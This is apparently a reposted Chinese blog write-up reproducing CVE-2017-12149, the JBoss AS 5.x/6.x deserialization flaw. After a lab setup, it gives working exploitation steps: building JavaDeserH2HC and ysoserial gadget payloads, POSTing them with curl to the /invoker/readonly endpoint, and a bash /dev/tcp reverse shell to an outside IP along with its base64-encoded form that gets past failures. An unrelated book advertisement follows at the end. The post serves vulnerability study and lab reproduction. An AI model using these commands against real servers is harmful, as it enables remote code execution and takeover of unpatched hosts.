内容简介:作者:znn原文地址:https://secvul.com/topics/948.html漏洞编号:
作者:znn
原文地址:https://secvul.com/topics/948.html
0x00 漏洞简介
漏洞编号:
CVE-2017-12149
漏洞名称:
Jboss AS 5.x/6.x 反序列化漏洞
漏洞描述:
JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致任意代码执行。
影响版本:
Jboss AS 5.x
Jboss AS 6.x
0x01 环境搭建
下载地址:
http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip
当然也可以是其他存在漏洞的版本(http://jbossas.jboss.org/downloads/)
然后:
cd jboss-xx/bin run.sh -b 0.0.0.0
这样Jboss就在0.0.0.0的8080端口跑起来了,当然 java 环境要提前准备好,这点无须多言。
0x02 漏洞复现
以下分别用两个Java反序列化 工具 进行测试
2.1、JavaDeserH2HC
https://github.com/joaomatosf/JavaDeserH2HC
如下测试反弹:
#Compiling javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java #Saving serialized object in ExampleCommonsCollections1.ser java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port #Exploiting vulnerable server: curl http://192.168.1.106:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
(注:用该工具测试直接执行命令一直失败,但nc返台的payload执行并没有问题,可能是工具本身问题,也可能是因为我太菜。)
2.2、ysoserial
https://github.com/frohoff/ysoserial
首先进行编译
mvn clean package -DskipTests
生成payload并发送
java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/123.txt" > tmp.ser curl http://192.168.1.106:8080/invoker/readonly --data-binary @tmp.ser
这里有个坑就是要执行反弹的时候,比如,
bash -i >& /dev/tcp/192.169.1.104/88 0>&1
要转成
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5LjEuMTA0Lzg4IDA+JjE=}|{base64,-d}|{bash,-i}
这种base64的形式,不然一直出错。
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
科技投资新时代:TMT投资方法、趋势与热点聚焦
马军、宋辉、段迎晟 / 人民邮电出版社 / 2018-3 / 69.00
中国 TMT 行业(科技、媒体及通信)起步较晚但充满朝气。2017 年,TMT 板块的IPO 数量占到了总数的四分之一;对于投资者来说,投资 TMT 的收益非常可观。那么,TMT 的投资趋势如何? TMT 行业又有哪些投资热点? 本书立足于 TMT 投资现状,在介绍了 TMT 投资的基本概念之后,作者详细讲述了TMT 投资的基本研究方法、分析视角、整体行情及趋势分析,同时从行业视角分析了包括......一起来看看 《科技投资新时代:TMT投资方法、趋势与热点聚焦》 这本书的介绍吧!
